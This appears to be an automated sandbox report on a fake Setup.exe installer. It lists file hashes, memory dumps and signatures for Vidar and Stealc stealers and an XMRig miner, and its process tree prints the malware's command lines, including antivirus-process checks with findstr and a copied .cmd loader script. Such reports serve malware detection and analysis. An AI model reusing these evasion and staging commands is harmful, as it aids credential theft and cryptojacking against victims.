SHA256 bfa2b066ea73af4b0296b130a7c1927a4723864502ec646809aca415677844a6
SHA512 359d9dc6751abf5dbbede201409e77652f595f40148f987272aacb50e320c43562f93db179727d05120c7bb8edb45c3fb81c30aebc91422f33ca7c70466b34b1

C:\Users\Admin\AppData\Local\Temp\Wallpaper

MD5 98d91341d4e754f361bbedeb35242a36
SHA1 4718235cf9242f7250700af2a3411357d2a2525c
SHA256 42d670d3dd28bc4597b71a9373763029451d0da5efe1288c774f6b512fae9f0e
SHA512 1e877510d91e6f62790b7f15c7ffa00c31e18f24bc3ec72dcd63e9c2b0031817bbf87e1f9d3359f50dd25f1d6e53eeea61fc9331ebc58f88361fcd2353e32fa9

C:\Users\Admin\AppData\Local\Temp\Pct

MD5 5021070dbffa36d9053699bee3f88806
SHA1 00ce3f117ffe45372c27af5f920ebacdeac92f93
SHA256 41757cf277d0f40e48e2bfc6d963db78308fdfe0b054f67685e2a6473e25327b
SHA512 628268ba6d7c30f1d03f84ff3955782ed23f426645fb8a914b83514f1de9ef23b5060f57e8c6f38dc8071adf063971f050989cab5eb2ef300072ccb58bd7183a

C:\Users\Admin\AppData\Local\Temp\Tomorrow

MD5 b348e7db88d0e52cfb6c7adb43628390
SHA1 5daa60ea78be614a992e88a60b655601cb45ebb6
SHA256 fa61763479671d7aa59798ccd20a2ae48102e24f2fdbc11e753c2141b3e0d135
SHA512 9d3018d203bad94e6a6efb2f5c5dfb55b14d5a6e1885cc60a34f0c647771cede2626e448f2fc194e3d17795c97ebb0bf283cb2a24a7db71f5e7fd15bdab01eff

C:\Users\Admin\AppData\Local\Temp\Serving

MD5 d0fa08b94bca138551c4b274ade27a75
SHA1 acaa349e9d6f03d622c2f0280247a43fbc078f3a
SHA256 4e9de0fd78447786652a61ab8339253c2ec4c671d3a9dd956d3aca384a7ee4a1
SHA512 bc17fd7b4b79f96d7adbf35c96919c49ace59ac0e2807fb31e7e88871218b5f0ad6f9183087c451675c16f24a16ed278fa78b325a3b631068e2fee16b3a84622

C:\Users\Admin\AppData\Local\Temp\Russian

MD5 91be5c23d6db4ea3e47b0259475cdd4b
SHA1 07cee20085effe581fddb260a65473c130e88e21
SHA256 8e6d9c7c4069ed6ea1fa346238ce48cf4479df04d1871e874f8c31e8ffede898
SHA512 e4f536a4f9b60098abd7212f82cacf6d9729a89c207a74a7dfcf8b9069a64eb024d60f0d506c1a50726d60c267222d200a50a6cc3a31a06ea1ef9ab3fce887e3

C:\Users\Admin\AppData\Local\Temp\Word

MD5 ca2ac61ab298e06c4d8f07792708705c
SHA1 35547141d3593d89746a4de38e809388de7b224f
SHA256 cabef77014cb90d5e896c046830742852edb20adcd1da71f88f8f8805d476607
SHA512 c6f0fccfaa08ef6f4d17698eb07cf27fa116b94bab2a25afe392acb2fecb1fb9d58301288e80839dadf834245a614846d72d1243693b40a56d7be45745f90218

C:\Users\Admin\AppData\Local\Temp\Shaft

MD5 4a29dcfa87b47e37e8b4447b840ccd91
SHA1 cd56012f27e7ece5545b6b07172f8f0169a852f5
SHA256 dbf049319595a1a9faf8c8dbc70814c4562c4b9dd10f18e56b0cb83e37cdce5c
SHA512 79b69684e7a72eb7fa24f36745f42370acc6655e44fbbd93dda679ed676c010a38a530b3b210196b6962e36ca1756fedb4341f867bdeb2e86c6ded23b7dde91f

C:\Users\Admin\AppData\Local\Temp\Colleagues

MD5 8a6af62b964e899f2fdb5b08bb70fe1d
SHA1 74d97553398f4952fc7244db53a54c5c9418680b
SHA256 621b098f227833dd3d62d4b181bf751e76d9688237ae27ba4475947863775103
SHA512 be082ccae47ebb4bb28f9d9fc9ffb089e081ab95d41232be5bd998fdfcb6995816141e46289f7fb15acf890bc97ce77fb413c8a56424a411dcce03354d093186

C:\Users\Admin\AppData\Local\Temp\Isle

MD5 c7edd1b120ffd89a03bb13f43248c03f
SHA1 70cdf64d0b1f9ddeed567599ed2b4ea6c0fad204
SHA256 84e53bfccccd03c162214a5b47741945c029afd23ec7ca307f1a66bc292ff3f8
SHA512 9d760c5455f7daa4ee1aeb3070d33cc43ec933f843333ae9d89f15d62f3840939bb83ad39420bf3fc9f800c8dcdde3f39085e7fcdfbedeeb999382ac1f9e75e2

C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif

MD5 b06e67f9767e5023892d9698703ad098
SHA1 acc07666f4c1d4461d3e1c263cf6a194a8dd1544
SHA256 8498900e57a490404e7ec4d8159bee29aed5852ae88bd484141780eaadb727bb
SHA512 7972c78acebdd86c57d879c12cb407120155a24a52fda23ddb7d9e181dd59dac1eb74f327817adbc364d37c8dc704f8236f3539b4d3ee5a022814924a1616943

memory/2544-580-0x0000000001200000-0x000000000194A000-memory.dmp

memory/2544-581-0x0000000001200000-0x000000000194A000-memory.dmp

memory/2544-583-0x0000000001200000-0x000000000194A000-memory.dmp

memory/2544-590-0x0000000001200000-0x000000000194A000-memory.dmp

memory/2544-592-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/2544-591-0x0000000001200000-0x000000000194A000-memory.dmp

memory/2544-605-0x0000000001200000-0x000000000194A000-memory.dmp

memory/2544-606-0x0000000001200000-0x000000000194A000-memory.dmp

memory/2544-614-0x0000000001200000-0x000000000194A000-memory.dmp

memory/2544-615-0x0000000001200000-0x000000000194A000-memory.dmp

memory/2544-631-0x0000000001200000-0x000000000194A000-memory.dmp

C:\ProgramData\GHIDHCBGDHJK\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

memory/2544-632-0x0000000001200000-0x000000000194A000-memory.dmp

C:\ProgramData\GHIDHCBGDHJK\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/2544-654-0x0000000001200000-0x000000000194A000-memory.dmp

memory/2544-655-0x0000000001200000-0x000000000194A000-memory.dmp

C:\ProgramData\FBKEHJEGCF.exe

MD5 6cfddd5ce9ca4bb209bd5d8c2cd80025
SHA1 424da82e9edbb6b39a979ab97d84239a1d67c48b
SHA256 376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7
SHA512 d861130d87bfedc38a97019cba17724067f397e6ffe7e1384175db48c0a177a2e7e256c3c933d0f42766e8077f767d6d4dc8758200852e8ec135736daee7c0f8

memory/3108-678-0x0000000000580000-0x0000000000A93000-memory.dmp

C:\ProgramData\HIDAFHDHCB.exe

MD5 daaff76b0baf0a1f9cec253560c5db20
SHA1 0311cf0eeb4beddd2c69c6e97462595313a41e78
SHA256 5706c6f5421a6a34fdcb67e9c9e71283c8fc1c33499904519cbdc6a21e6b071c
SHA512 987ca2d67903c65ee1075c4a5250c85840aea26647b1d95a3e73a26dcad053bd4c31df4ca01d6cc0c196fa7e8e84ab63ed4a537f72fc0b1ee4ba09cdb549ddf3

memory/3688-689-0x0000000000390000-0x00000000005D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\df55a8ac

MD5 c62f812e250409fbd3c78141984270f2
SHA1 9c7c70bb78aa0de4ccf0c2b5d87b37c8a40bd806
SHA256 d8617477c800cc10f9b52e90b885117a27266831fb5033647b6b6bd6025380a8
SHA512 7573ecac1725f395bbb1661f743d8ee6b029f357d3ef07d0d96ee4ff3548fe06fab105ee72be3e3964d2053de2f44245cca9a061d47c1411949840c84f6e9092

memory/3688-699-0x0000000072CB0000-0x0000000072E2B000-memory.dmp

memory/3108-701-0x0000000072CB0000-0x0000000072E2B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e1bd5b54

MD5 8d443e7cb87cacf0f589ce55599e008f
SHA1 c7ff0475a3978271e0a8417ac4a826089c083772
SHA256 e2aaaa1a0431aab1616e2b612e9b68448107e6ce71333f9c0ec1763023b72b2a
SHA512 c7d0ced6eb9e203d481d1dbdd5965278620c10cdc81c02da9c4f7f99f3f8c61dfe975cf48d4b93ccde9857edb881a77ebe9cd13ae7ef029285d770d767aa74a5

memory/3688-703-0x00007FFB11E30000-0x00007FFB12025000-memory.dmp

memory/3108-702-0x00007FFB11E30000-0x00007FFB12025000-memory.dmp

memory/2544-707-0x0000000001200000-0x000000000194A000-memory.dmp

memory/2544-708-0x0000000001200000-0x000000000194A000-memory.dmp

memory/3108-709-0x0000000072CB0000-0x0000000072E2B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e3ed7ca7

MD5 3c2e533e9352895faed95e0830829d97
SHA1 2bff4c2cafbc2de59ebe44152a6f6a5ba276f4b6
SHA256 f1a19233d6c730f5db46b2c087d2ade84c4e5cbb757782c559ed56a8f7930aee
SHA512 22fc811c04cdd10dc862397b7decf6dede9a64c5ca457a3290a974e63d797603b5a69ff9cec2bac7a583690016745503b69e4494d95dcd6107dfc50e6fb5d9ea

memory/3688-711-0x0000000072CB0000-0x0000000072E2B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e4baa802

MD5 e682fda5e7495884c6fcec7abdaa7996
SHA1 f4f1a342e90260321a31c288f132e19a65f7c596
SHA256 786c8b4f84430e0c77fb9c781e2a97c269652b0a5f386515cc20eefd2c6ea1b0
SHA512 bb5e5fe27e9e245ae5cd16291b9718976690571589d0cea64b2c0d23f79f0b6047d8f465b763cfe18dfb06a9b577a063a6acbd446f6bb061483541d574c65c7e

memory/2544-715-0x0000000001200000-0x000000000194A000-memory.dmp

memory/2544-716-0x0000000001200000-0x000000000194A000-memory.dmp

memory/4464-721-0x00007FFB11E30000-0x00007FFB12025000-memory.dmp

memory/952-722-0x00007FFB11E30000-0x00007FFB12025000-memory.dmp

memory/952-727-0x0000000072CB0000-0x0000000072E2B000-memory.dmp

C:\ProgramData\GHIDHCBGDHJK\VCRUNT~1.DLL

MD5 a37ee36b536409056a86f50e67777dd7
SHA1 1cafa159292aa736fc595fc04e16325b27cd6750
SHA256 8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA512 3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

C:\ProgramData\GHIDHCBGDHJK\softokn3.dll

MD5 4e52d739c324db8225bd9ab2695f262f
SHA1 71c3da43dc5a0d2a1941e874a6d015a071783889
SHA256 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a
SHA512 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6

C:\ProgramData\GHIDHCBGDHJK\msvcp140.dll

MD5 5ff1fca37c466d6723ec67be93b51442
SHA1 34cc4e158092083b13d67d6d2bc9e57b798a303b
SHA256 5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062
SHA512 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

memory/4464-742-0x0000000072CB0000-0x0000000072E2B000-memory.dmp

memory/2972-746-0x00007FFAF2D50000-0x00007FFAF43C7000-memory.dmp

memory/1780-749-0x00007FFB11E30000-0x00007FFB12025000-memory.dmp

memory/2972-750-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1780-753-0x00000000002E0000-0x0000000000351000-memory.dmp

memory/2992-755-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2992-759-0x0000027515F40000-0x0000027515F60000-memory.dmp

memory/2992-758-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2992-757-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2992-761-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2992-760-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2992-764-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2992-762-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2992-763-0x0000000140000000-0x00000001407DC000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-15 10:02

Reported

2024-06-15 10:05

Platform

win11-20240611-en

Max time kernel

120s

Max time network

123s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2408 created 3176 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Windows\Explorer.EXE

Vidar

stealer vidar

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\ProgramData\ECFCBKJDBF.exe N/A
N/A N/A C:\ProgramData\CBGHCAKKFB.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2408 set thread context of 416 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 1440 set thread context of 3456 N/A C:\ProgramData\ECFCBKJDBF.exe C:\Windows\SysWOW64\ftp.exe
PID 4836 set thread context of 540 N/A C:\ProgramData\CBGHCAKKFB.exe C:\Windows\SysWOW64\ftp.exe
PID 540 set thread context of 1900 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 1900 set thread context of 2556 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\TWI Cloud Host.job C:\Windows\SysWOW64\ftp.exe N/A
File created C:\Windows\Tasks\Watcher Com SH.job C:\Windows\SysWOW64\ftp.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\ProgramData\ECFCBKJDBF.exe N/A
N/A N/A C:\ProgramData\CBGHCAKKFB.exe N/A
N/A N/A C:\ProgramData\ECFCBKJDBF.exe N/A
N/A N/A C:\ProgramData\CBGHCAKKFB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\ECFCBKJDBF.exe N/A
N/A N/A C:\ProgramData\CBGHCAKKFB.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3132 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\@^NewFile_PCSetup_99553__________^$\Setup.exe C:\Windows\SysWOW64\cmd.exe
PID 3132 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\@^NewFile_PCSetup_99553__________^$\Setup.exe C:\Windows\SysWOW64\cmd.exe
PID 3132 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\@^NewFile_PCSetup_99553__________^$\Setup.exe C:\Windows\SysWOW64\cmd.exe
PID 4208 wrote to memory of 988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4208 wrote to memory of 988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4208 wrote to memory of 988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4208 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4208 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4208 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4208 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4208 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4208 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4208 wrote to memory of 3860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4208 wrote to memory of 3860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4208 wrote to memory of 3860 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4208 wrote to memory of 1412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4208 wrote to memory of 1412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4208 wrote to memory of 1412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4208 wrote to memory of 3896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4208 wrote to memory of 3896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4208 wrote to memory of 3896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4208 wrote to memory of 4720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4208 wrote to memory of 4720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4208 wrote to memory of 4720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4208 wrote to memory of 2408 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 4208 wrote to memory of 2408 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 4208 wrote to memory of 2408 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 4208 wrote to memory of 2804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4208 wrote to memory of 2804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4208 wrote to memory of 2804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2408 wrote to memory of 416 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 2408 wrote to memory of 416 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 2408 wrote to memory of 416 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 2408 wrote to memory of 416 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 2408 wrote to memory of 416 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif
PID 416 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\ProgramData\ECFCBKJDBF.exe
PID 416 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\ProgramData\ECFCBKJDBF.exe
PID 416 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\ProgramData\ECFCBKJDBF.exe
PID 416 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\ProgramData\CBGHCAKKFB.exe
PID 416 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\ProgramData\CBGHCAKKFB.exe
PID 416 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\ProgramData\CBGHCAKKFB.exe
PID 1440 wrote to memory of 3456 N/A C:\ProgramData\ECFCBKJDBF.exe C:\Windows\SysWOW64\ftp.exe
PID 1440 wrote to memory of 3456 N/A C:\ProgramData\ECFCBKJDBF.exe C:\Windows\SysWOW64\ftp.exe
PID 1440 wrote to memory of 3456 N/A C:\ProgramData\ECFCBKJDBF.exe C:\Windows\SysWOW64\ftp.exe
PID 4836 wrote to memory of 540 N/A C:\ProgramData\CBGHCAKKFB.exe C:\Windows\SysWOW64\ftp.exe
PID 4836 wrote to memory of 540 N/A C:\ProgramData\CBGHCAKKFB.exe C:\Windows\SysWOW64\ftp.exe
PID 4836 wrote to memory of 540 N/A C:\ProgramData\CBGHCAKKFB.exe C:\Windows\SysWOW64\ftp.exe
PID 1440 wrote to memory of 3456 N/A C:\ProgramData\ECFCBKJDBF.exe C:\Windows\SysWOW64\ftp.exe
PID 4836 wrote to memory of 540 N/A C:\ProgramData\CBGHCAKKFB.exe C:\Windows\SysWOW64\ftp.exe
PID 416 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Windows\SysWOW64\cmd.exe
PID 416 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Windows\SysWOW64\cmd.exe
PID 416 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\366279\Suspect.pif C:\Windows\SysWOW64\cmd.exe
PID 4372 wrote to memory of 2964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4372 wrote to memory of 2964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4372 wrote to memory of 2964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 540 wrote to memory of 1900 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 540 wrote to memory of 1900 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 3456 wrote to memory of 3840 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 3456 wrote to memory of 3840 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 3456 wrote to memory of 3840 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 540 wrote to memory of 1900 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 540 wrote to memory of 1900 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 3456 wrote to memory of 3840 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 1900 wrote to memory of 2556 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\@^NewFile_PCSetup_99553__________^$\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\@^NewFile_PCSetup_99553__________^$\Setup.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Revenues Revenues.cmd & Revenues.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 366279

C:\Windows\SysWOW64\findstr.exe

findstr /V "RingtoneRentMicrosoftFocuses" Editors

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Isle 366279\m

